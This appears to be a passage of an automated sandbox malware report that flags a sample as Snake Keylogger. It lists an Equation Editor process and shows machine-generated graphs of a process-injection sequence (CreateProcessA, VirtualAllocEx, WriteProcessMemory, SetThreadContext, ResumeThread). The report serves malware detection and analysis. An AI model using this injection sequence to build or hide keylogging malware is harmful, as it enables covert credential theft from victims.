                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.864677424.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Target ID:9
                    Start time:14:06:26
                    Start date:01/07/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false


                      Execution Graph

                      Execution Coverage:16.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:4.8%
                      Total number of Nodes:105
                      Total number of Limit Nodes:5
                      execution_graph 10489 1c0dbf 10492 1c0a2c 10489->10492 10491 1c0a3b 10492->10491 10494 1c1978 10492->10494 10495 1c1992 10494->10495 10512 1c1fdd 10495->10512 10516 1c1dc2 10495->10516 10521 1c20e1 10495->10521 10526 1c1fa7 10495->10526 10531 1c2707 10495->10531 10537 1c23c5 10495->10537 10542 1c21e5 10495->10542 10547 1c1eea 10495->10547 10555 1c268a 10495->10555 10559 1c1f89 10495->10559 10563 1c222f 10495->10563 10568 1c2013 10495->10568 10571 1c1f34 10495->10571 10576 1c1c58 10495->10576 10581 1c273e 10495->10581 10496 1c0e15 10586 26fea0 10512->10586 10590 26fea8 10512->10590 10513 1c1ff7 10517 1c1d41 10516->10517 10518 1c1e1b 10517->10518 10594 1c04f4 10517->10594 10598 1c0500 10517->10598 10518->10496 10522 1c2111 10521->10522 10602 1c0168 10522->10602 10606 1c0161 10522->10606 10523 1c1ec4 10523->10496 10527 1c1fb4 10526->10527 10610 26f980 10527->10610 10614 26f978 10527->10614 10528 1c23f1 10532 1c23dc 10531->10532 10533 1c2714 10531->10533 10535 26f980 ResumeThread 10532->10535 10536 26f978 ResumeThread 10532->10536 10534 1c23f1 10535->10534 10536->10534 10538 1c23cb 10537->10538 10540 26f980 ResumeThread 10538->10540 10541 26f978 ResumeThread 10538->10541 10539 1c23f1 10540->10539 10541->10539 10543 1c21e8 10542->10543 10545 26f980 ResumeThread 10543->10545 10546 26f978 ResumeThread 10543->10546 10544 1c23f1 10545->10544 10546->10544 10618 1c29f0 10547->10618 10622 1c2a00 10547->10622 10548 1c1f1f 10549 1c283f 10548->10549 10551 1c0168 WriteProcessMemory 10548->10551 10552 1c0161 WriteProcessMemory 10548->10552 10549->10496 10550 1c1ec4 10550->10496 10551->10550 10552->10550 10557 1c0168 WriteProcessMemory 10555->10557 10558 1c0161 WriteProcessMemory 10555->10558 10556 1c26ae 10557->10556 10558->10556 10560 1c1f95 10559->10560 10561 1c239e 10560->10561 10630 1c02c8 10560->10630 10561->10496 10564 1c2258 10563->10564 10566 26f980 ResumeThread 10564->10566 10567 26f978 ResumeThread 10564->10567 10565 1c23f1 10566->10565 10567->10565 
10569 1c2019 10568->10569 10570 1c02c8 ReadProcessMemory 10569->10570 10570->10569 10572 1c1f57 10571->10572 10574 1c0168 WriteProcessMemory 10572->10574 10575 1c0161 WriteProcessMemory 10572->10575 10573 1c266b 10574->10573 10575->10573 10577 1c1c9b 10576->10577 10578 1c1e1b 10577->10578 10579 1c04f4 CreateProcessA 10577->10579 10580 1c0500 CreateProcessA 10577->10580 10578->10496 10579->10578 10580->10578 10582 1c2744 10581->10582 10583 1c202a 10582->10583 10585 1c02c8 ReadProcessMemory 10582->10585 10584 1c02c8 ReadProcessMemory 10583->10584 10584->10583 10585->10583 10587 26fef1 Wow64SetThreadContext 10586->10587 10589 26ff6f 10587->10589 10589->10513 10591 26fef1 Wow64SetThreadContext 10590->10591 10593 26ff6f 10591->10593 10593->10513 10595 1c0587 CreateProcessA 10594->10595 10597 1c07e5 10595->10597 10599 1c0587 CreateProcessA 10598->10599 10601 1c07e5 10599->10601 10603 1c01b4 WriteProcessMemory 10602->10603 10605 1c0253 10603->10605 10605->10523 10607 1c01b4 WriteProcessMemory 10606->10607 10609 1c0253 10607->10609 10609->10523 10611 26f9c4 ResumeThread 10610->10611 10613 26fa16 10611->10613 10613->10528 10615 26f97d ResumeThread 10614->10615 10617 26fa16 10615->10617 10617->10528 10619 1c2a15 10618->10619 10626 1c0040 10619->10626 10623 1c2a15 10622->10623 10625 1c0040 VirtualAllocEx 10623->10625 10624 1c2a34 10624->10548 10625->10624 10627 1c0084 VirtualAllocEx 10626->10627 10629 1c0102 10627->10629 10629->10548 10631 1c0314 ReadProcessMemory 10630->10631 10633 1c0392 10631->10633 10633->10560

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 2605e0-2614f5 call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc call 260ebc call 260ecc call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc 64 2615b1-2618ba call 260edc call 260eec * 2 call 260efc call 260f0c call 260f1c call 260f2c * 5 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c 0->64 65 2614fb-26152b 0->65 71 263443-26345f 64->71 135 2618c0-26194b call 260f8c call 260f9c 64->135 65->71 72 261531-26153f 65->72 72->71 73 261545-26155c 72->73 73->71 75 261562-26159d 73->75 75->71 77 2615a3-2615ab 75->77 77->64 77->65 145 261951-263442 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260ffc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 26101c call 260f3c call 260f4c call 260f5c call 26102c call 260f6c call 260f7c call 26103c call 260f3c call 260f5c call 26104c call 260f6c call 260f7c call 
26105c call 26106c call 26107c call 26108c call 260fac * 8 call 26109c call 2610ac call 2610bc call 260f5c call 2610cc call 2610dc call 2610ec call 2610fc call 2610ec call 2610fc call 2610ec * 2 call 2610fc call 2610ec call 2610fc 135->145
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$Ppp$g$g$k$k$u$u$u$u
                      • API String ID: 0-4064997190
                      • Opcode ID: 2c615f5d9b5d5762a1b4a472ceab911ee81f75e3ccab40274bf050c6662c7895
                      • Instruction ID: 2a2a6b26b475e230072c97b39945885c25527d143c2be7ddbed3a634736f67c1
                      • Opcode Fuzzy Hash: 2c615f5d9b5d5762a1b4a472ceab911ee81f75e3ccab40274bf050c6662c7895
                      • Instruction Fuzzy Hash: 17231A30910715CFC725EF74C894B9AB7B2BF89300F508A99E4496B261EF75AAC5CF81

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 500 2612c9-2614f5 call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc call 260ebc call 260ecc call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc 562 2615b1 500->562 563 2614fb-26152b 500->563 564 2615bb-2615bf call 260edc 562->564 569 263443-26345f 563->569 570 261531-26153f 563->570 567 2615c4-26160b call 260eec * 2 564->567 585 261615-261619 call 260efc 567->585 570->569 571 261545-26155c 570->571 571->569 573 261562-26159d 571->573 573->569 575 2615a3-2615ab 573->575 575->562 575->563 587 26161e-261629 585->587 589 261633-261637 call 260f0c 587->589 591 26163c-26189c call 260f1c call 260f2c * 5 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c 589->591 630 2618a1-2618b0 591->630 632 2618b6-2618ba 630->632 632->569 633 2618c0-261926 call 260f8c call 260f9c 632->633 642 261930-26194b 633->642 643 261951-263442 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260ffc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c 
call 260fec call 26100c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 26101c call 260f3c call 260f4c call 260f5c call 26102c call 260f6c call 260f7c call 26103c call 260f3c call 260f5c call 26104c call 260f6c call 260f7c call 26105c call 26106c call 26107c call 26108c call 260fac * 8 call 26109c call 2610ac call 2610bc call 260f5c call 2610cc call 2610dc call 2610ec call 2610fc call 2610ec call 2610fc call 2610ec * 2 call 2610fc call 2610ec call 2610fc 642->643
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$Ppp$g$g$k$k$u$u$u$u
                      • API String ID: 0-4064997190
                      • Opcode ID: 51ffc13ccb4bfda8632de17c8e4f419bd6cd4593fca335ae5da53539d86d774f
                      • Instruction ID: 99522a37e565e80389fbf93d04935dd071ec3095b17738584726094b37bbe24c
                      • Opcode Fuzzy Hash: 51ffc13ccb4bfda8632de17c8e4f419bd6cd4593fca335ae5da53539d86d774f
                      • Instruction Fuzzy Hash: EF231A30910715CFC725EF74C894B9AB7B2BF89300F518A99E4496B261EF71AAC5CF81
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b231d53405fc83612c0a7b6ac1136a959e08bcdccdf038692457a94e839a78c
                      • Instruction ID: e6838f736a032b3bc0a1a8805572a5e0dc5e0084ec57b42b8d397b5a344bd1b6
                      • Opcode Fuzzy Hash: 3b231d53405fc83612c0a7b6ac1136a959e08bcdccdf038692457a94e839a78c
                      • Instruction Fuzzy Hash: 21814A71D45219DFDB28CF66CC40BE9BBB6BF9A300F10D1AAC409A7251EB704A85DF40

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1149 1c04f4-1c0599 1151 1c059b-1c05b2 1149->1151 1152 1c05e2-1c060a 1149->1152 1151->1152 1157 1c05b4-1c05b9 1151->1157 1155 1c060c-1c0620 1152->1155 1156 1c0650-1c06a6 1152->1156 1155->1156 1167 1c0622-1c0627 1155->1167 1165 1c06ec-1c07e3 CreateProcessA 1156->1165 1166 1c06a8-1c06bc 1156->1166 1158 1c05dc-1c05df 1157->1158 1159 1c05bb-1c05c5 1157->1159 1158->1152 1162 1c05c9-1c05d8 1159->1162 1163 1c05c7 1159->1163 1162->1162 1164 1c05da 1162->1164 1163->1162 1164->1158 1185 1c07ec-1c08d1 1165->1185 1186 1c07e5-1c07eb 1165->1186 1166->1165 1174 1c06be-1c06c3 1166->1174 1168 1c0629-1c0633 1167->1168 1169 1c064a-1c064d 1167->1169 1171 1c0635 1168->1171 1172 1c0637-1c0646 1168->1172 1169->1156 1171->1172 1172->1172 1175 1c0648 1172->1175 1176 1c06c5-1c06cf 1174->1176 1177 1c06e6-1c06e9 1174->1177 1175->1169 1179 1c06d1 1176->1179 1180 1c06d3-1c06e2 1176->1180 1177->1165 1179->1180 1180->1180 1182 1c06e4 1180->1182 1182->1177 1198 1c08e1-1c08e5 1185->1198 1199 1c08d3-1c08d7 1185->1199 1186->1185 1200 1c08f5-1c08f9 1198->1200 1201 1c08e7-1c08eb 1198->1201 1199->1198 1202 1c08d9 1199->1202 1204 1c0909-1c090d 1200->1204 1205 1c08fb-1c08ff 1200->1205 1201->1200 1203 1c08ed 1201->1203 1202->1198 1203->1200 1207 1c090f-1c0938 1204->1207 1208 1c0943-1c094e 1204->1208 1205->1204 1206 1c0901 1205->1206 1206->1204 1207->1208 1211 1c094f 1208->1211 1211->1211
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C07C7
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 32cab24dd05fd1c841a5deb3322599031f91c8c022f7ec9d282b58446d1af6ed
                      • Instruction ID: 17dcc16ac7fee2c73d15ae0175ee7644dae039c6c2bced44599934abd65067cd
                      • Opcode Fuzzy Hash: 32cab24dd05fd1c841a5deb3322599031f91c8c022f7ec9d282b58446d1af6ed
                      • Instruction Fuzzy Hash: A4C11470D00229CFDF25CFA8C845BEEBBB1BB59304F0091AAD859B7250DB749A85CF95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1213 1c0500-1c0599 1215 1c059b-1c05b2 1213->1215 1216 1c05e2-1c060a 1213->1216 1215->1216 1221 1c05b4-1c05b9 1215->1221 1219 1c060c-1c0620 1216->1219 1220 1c0650-1c06a6 1216->1220 1219->1220 1231 1c0622-1c0627 1219->1231 1229 1c06ec-1c07e3 CreateProcessA 1220->1229 1230 1c06a8-1c06bc 1220->1230 1222 1c05dc-1c05df 1221->1222 1223 1c05bb-1c05c5 1221->1223 1222->1216 1226 1c05c9-1c05d8 1223->1226 1227 1c05c7 1223->1227 1226->1226 1228 1c05da 1226->1228 1227->1226 1228->1222 1249 1c07ec-1c08d1 1229->1249 1250 1c07e5-1c07eb 1229->1250 1230->1229 1238 1c06be-1c06c3 1230->1238 1232 1c0629-1c0633 1231->1232 1233 1c064a-1c064d 1231->1233 1235 1c0635 1232->1235 1236 1c0637-1c0646 1232->1236 1233->1220 1235->1236 1236->1236 1239 1c0648 1236->1239 1240 1c06c5-1c06cf 1238->1240 1241 1c06e6-1c06e9 1238->1241 1239->1233 1243 1c06d1 1240->1243 1244 1c06d3-1c06e2 1240->1244 1241->1229 1243->1244 1244->1244 1246 1c06e4 1244->1246 1246->1241 1262 1c08e1-1c08e5 1249->1262 1263 1c08d3-1c08d7 1249->1263 1250->1249 1264 1c08f5-1c08f9 1262->1264 1265 1c08e7-1c08eb 1262->1265 1263->1262 1266 1c08d9 1263->1266 1268 1c0909-1c090d 1264->1268 1269 1c08fb-1c08ff 1264->1269 1265->1264 1267 1c08ed 1265->1267 1266->1262 1267->1264 1271 1c090f-1c0938 1268->1271 1272 1c0943-1c094e 1268->1272 1269->1268 1270 1c0901 1269->1270 1270->1268 1271->1272 1275 1c094f 1272->1275 1275->1275
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C07C7
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: c8dbf6ffe13bbdc0dacd612bbd2db95b25bd076917136edcce2c2f35d84c1ef3
                      • Instruction ID: 35c4d5b7c9ccd7b6bdb34a2e8d3eaeea234548fd3365a0f79d1014ea97f67d8c
                      • Opcode Fuzzy Hash: c8dbf6ffe13bbdc0dacd612bbd2db95b25bd076917136edcce2c2f35d84c1ef3
                      • Instruction Fuzzy Hash: 4BC11370D00229CFDF25CFA8C845BEEBBB1BB59304F0091AAD859B7250DB749A85CF95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1277 1c0161-1c01d3 1279 1c01ea-1c0251 WriteProcessMemory 1277->1279 1280 1c01d5-1c01e7 1277->1280 1282 1c025a-1c02ac 1279->1282 1283 1c0253-1c0259 1279->1283 1280->1279 1283->1282
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C023B
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 722d9a38417bd55498a7281ff92069f68c74673477581d162a75692a9599536d
                      • Instruction ID: 90c55dff357a995acdfe47b3c8a2b95acf45cea53721087f22aea55c2bc9df96
                      • Opcode Fuzzy Hash: 722d9a38417bd55498a7281ff92069f68c74673477581d162a75692a9599536d
                      • Instruction Fuzzy Hash: C641B9B4D002489FCF00CFA9D984AEEFBF1BB49314F24902AE815B7210D374AA45CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1288 1c0168-1c01d3 1290 1c01ea-1c0251 WriteProcessMemory 1288->1290 1291 1c01d5-1c01e7 1288->1291 1293 1c025a-1c02ac 1290->1293 1294 1c0253-1c0259 1290->1294 1291->1290 1294->1293
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C023B
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 94049cba4c606da5408133a8e604b5c3acdf938b770655c00d1b4e6ac34880ee
                      • Instruction ID: aa486f201061d2590966999898e466adafa2bda616706b72236340e7518de87c
                      • Opcode Fuzzy Hash: 94049cba4c606da5408133a8e604b5c3acdf938b770655c00d1b4e6ac34880ee
                      • Instruction Fuzzy Hash: 1D41A8B4D002489FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D774AA45CF64

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1299 1c02c8-1c0390 ReadProcessMemory 1302 1c0399-1c03eb 1299->1302 1303 1c0392-1c0398 1299->1303 1303->1302
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C037A
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 3fe4b22dcffe02a0be885190d970154e81aef55cb5b5065d615e46fa3707ea54
                      • Instruction ID: a04c151eb17faaa2fe44ac1922afef2345c55578f3bb4713e6ef34b030b97042
                      • Opcode Fuzzy Hash: 3fe4b22dcffe02a0be885190d970154e81aef55cb5b5065d615e46fa3707ea54
                      • Instruction Fuzzy Hash: E84199B9D00258DFCF10CFA9D984AEEFBB1BB49314F10A42AE814B7210D775A945CF65

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1308 1c0040-1c0100 VirtualAllocEx 1311 1c0109-1c0153 1308->1311 1312 1c0102-1c0108 1308->1312 1312->1311
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C00EA
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: a01961f35b2d7153d566bc7372eb05c44d86ba693e7ede67617e0188f722178c
                      • Instruction ID: 51588ec949cb69af5eb6651e3d1d7d6afa2e048f95e00112098001ea89cc5148
                      • Opcode Fuzzy Hash: a01961f35b2d7153d566bc7372eb05c44d86ba693e7ede67617e0188f722178c
                      • Instruction Fuzzy Hash: 864199B8D002589FCF10CFA9D984AAEFBB1AB49314F10942AE814B7210D775A945CF65

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1317 26fea0-26ff08 1319 26ff1f-26ff6d Wow64SetThreadContext 1317->1319 1320 26ff0a-26ff1c 1317->1320 1322 26ff76-26ffc2 1319->1322 1323 26ff6f-26ff75 1319->1323 1320->1319 1323->1322
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0026FF57
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 0bf2e92cfda671630c93c95e71e350e02c4b03f84fa525d44749e30be47217c7
                      • Instruction ID: d122896ff4f5e1244f73a6e7b2a4a507f65a20d320b210847e33c2362c1527bc
                      • Opcode Fuzzy Hash: 0bf2e92cfda671630c93c95e71e350e02c4b03f84fa525d44749e30be47217c7
                      • Instruction Fuzzy Hash: C341CCB5D002589FCF10CFA9D984AEEFBF1AF49314F24802AE418B7240C778A989CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1328 26fea8-26ff08 1330 26ff1f-26ff6d Wow64SetThreadContext 1328->1330 1331 26ff0a-26ff1c 1328->1331 1333 26ff76-26ffc2 1330->1333 1334 26ff6f-26ff75 1330->1334 1331->1330 1334->1333
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0026FF57
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 3665481f2801d3b5d6d46bedfb1d337230e4d75a585f8961a4d10f3bf8152e09
                      • Instruction ID: f4f682b88a4673236428bc602b28f91f3b206cac2fdd48300f9a45463b111a44
                      • Opcode Fuzzy Hash: 3665481f2801d3b5d6d46bedfb1d337230e4d75a585f8961a4d10f3bf8152e09
                      • Instruction Fuzzy Hash: 4E41AEB4D102589FCF10CFA9D984AEEFBB1AF49314F24802AE418B7244D778A985CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1339 26f978-26fa14 ResumeThread 1343 26fa16-26fa1c 1339->1343 1344 26fa1d-26fa5f 1339->1344 1343->1344
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 0026F9FE
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 649225765207556f227940e6ff008a6c18a384d029324b6f2ab72e6cf5c67c07
                      • Instruction ID: a80fcfd69d489384e03a2ce52d28ea7786817a8daf1c372eb7e366059cea2854
                      • Opcode Fuzzy Hash: 649225765207556f227940e6ff008a6c18a384d029324b6f2ab72e6cf5c67c07
                      • Instruction Fuzzy Hash: 9231CDB4D102589FCF10CFA9E984AEEFBB1AF49314F24942AE819B7300C775A945CF94

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1349 26f980-26fa14 ResumeThread 1352 26fa16-26fa1c 1349->1352 1353 26fa1d-26fa5f 1349->1353 1352->1353
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 0026F9FE
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 0ca5930d45403d40330c38cacb09b917e5f7ae476f5379f98c638a2ddbcec42d
                      • Instruction ID: 17d3ecef504b8b382b49d34e81444ae042ae126db5f58b6016a643d68fe27b7a
                      • Opcode Fuzzy Hash: 0ca5930d45403d40330c38cacb09b917e5f7ae476f5379f98c638a2ddbcec42d
                      • Instruction Fuzzy Hash: FD31CDB4D102589FCF10CFA9E984AEEFBB5AF49314F14942AE819B7300C775A945CF94
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6664dfc41c9e6fca376a9eb9678d0b60404b8d75aa725186d94f7c5a5c9a2f81
                      • Instruction ID: d479a9d812b95eba47cb5b774547ecdfd088709ee232529fe61fa43ef20b8241
                      • Opcode Fuzzy Hash: 6664dfc41c9e6fca376a9eb9678d0b60404b8d75aa725186d94f7c5a5c9a2f81
                      • Instruction Fuzzy Hash: 6F2104B1604240EFDB15CF14F9C0B26BBA5FB84314F34C5ADE8494B246C336D866CB61
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6142920924f2450e835391fa6948f434b5160f13a3f4a6577285532b28b25ae
                      • Instruction ID: df4b092c05ec048f0677460fb9249acd6b4442e4a14bf5aa15fdfa5b793664ba
                      • Opcode Fuzzy Hash: a6142920924f2450e835391fa6948f434b5160f13a3f4a6577285532b28b25ae
                      • Instruction Fuzzy Hash: C221D075604240EFDB15CF14F884B26BB61EB84314F34C5A9E8494B266C736D857CBA5
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4334226fc26c75ff5f4929e58fe71be2c6ef150af434025ed9b75f939bc560c
                      • Instruction ID: 36c00038482e56a82454aa88e7d3d25f0ccc442ad35623984ca1075d80f8db53
                      • Opcode Fuzzy Hash: b4334226fc26c75ff5f4929e58fe71be2c6ef150af434025ed9b75f939bc560c
                      • Instruction Fuzzy Hash: E42130755083809FDB12CF24E994715BF71EF46314F28C5EAD8498F267C33A985ACB62
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
